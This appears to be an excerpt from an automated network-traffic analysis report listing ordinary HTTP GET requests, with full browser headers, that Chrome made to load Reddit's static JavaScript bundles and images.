Source: global trafficHTTP traffic detected: GET /shreddit/en-US/recommendation-context-overflow-menu-abe9c9f1.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/shell-4994f581.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/unpacking-overflow-menu-d0d2ca01.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/shell-4994f581.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/shreddit-player-2-c1d75db3.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/shell-4994f581.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /t5_dijpkz/styles/profileIcon_akbki6b145he1.png?width=48&height=48&frame=1&auto=webp&crop=&s=f71319db70cb345de1bf4e719e5cad9dd5918093 HTTP/1.1Host: styles.redditmedia.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/gallery-carousel-f4996dfe.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/shell-4994f581.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /dP5fFEO6XTK_bmmHMeUdZSBYh5mT42xU5DThZ2ugVd0.png?width=640&crop=smart&format=pjpg&auto=webp&s=718bb239cfaaa5b6a857036355cbf36e06007608 HTTP/1.1Host: external-preview.redd.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/gallery-caption-3b91cdb5.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/shell-4994f581.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/sidebar-ad-client-js-a1fc0d15.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/shell-4994f581.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/hui-left-nav-see-more-6c847fa5.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/shell-4994f581.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/faceplate-expandable-section-helper-f8f3e473.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/shell-4994f581.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/faceplate-auto-height-animator-6e628cf9.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/shell-4994f581.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/alert-controller-client-js-d21c2f4c.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/authentication-unit-client-js-709b9601.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/left-nav-recent-section-client-js-cad9dd70.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/trend-page-client-js-f8d9bc80.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-ad-client-js-b90fbf7b.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/pdp-ad-client-js-d703e7d3.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-ad-client-js-b90fbf7b.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/activate-lead-gen-dialog-5e20bf34.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-ad-client-js-b90fbf7b.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/click-location-tracker-32ee9eb3.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-ad-client-js-b90fbf7b.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/shreddit-dynamic-ad-link-fcaf1820.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-ad-client-js-b90fbf7b.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/with-ad-observer-5931d8eb.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-ad-client-js-b90fbf7b.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/ssa-parser-f2f362d6.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-ad-client-js-b90fbf7b.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/errors-98e883e2.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-ad-client-js-b90fbf7b.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/overflow-menu-actions-fd509c7d.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-ad-client-js-b90fbf7b.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/distinguished-tags-28b29a34.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-ad-client-js-b90fbf7b.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/content-action-button-5fdf727f.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-ad-client-js-b90fbf7b.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/partial-feed-post-client-js-9de4a8bc.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-ad-client-js-b90fbf7b.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/mod-log-takedown-preview-client-js-13462cf3.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-ad-client-js-b90fbf7b.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/shop-gallery-data-fetcher-client-js-a66aa4d3.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-ad-client-js-b90fbf7b.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/number-68db534b.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-ad-client-js-b90fbf7b.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/faceplate-shimmer-252a0dfd.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-ad-client-js-b90fbf7b.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/index-e2ec7e4b.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-ad-client-js-b90fbf7b.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/award-controller-7d9d8182.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-ad-client-js-b90fbf7b.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/awardsTelemetryState-36bf2914.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-ad-client-js-b90fbf7b.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/modActions-7666e3bf.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-ad-client-js-b90fbf7b.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/awards-d066f3fe.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-ad-client-js-b90fbf7b.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/rpl-tooltip-958cc522.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-ad-client-js-b90fbf7b.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/tooltip.base-aa9be46d.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-ad-client-js-b90fbf7b.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/rpl-popper-3f91bd17.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-ad-client-js-b90fbf7b.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/mod-bulk-actions-983b8f48.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/feed-ad-client-js-b90fbf7b.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
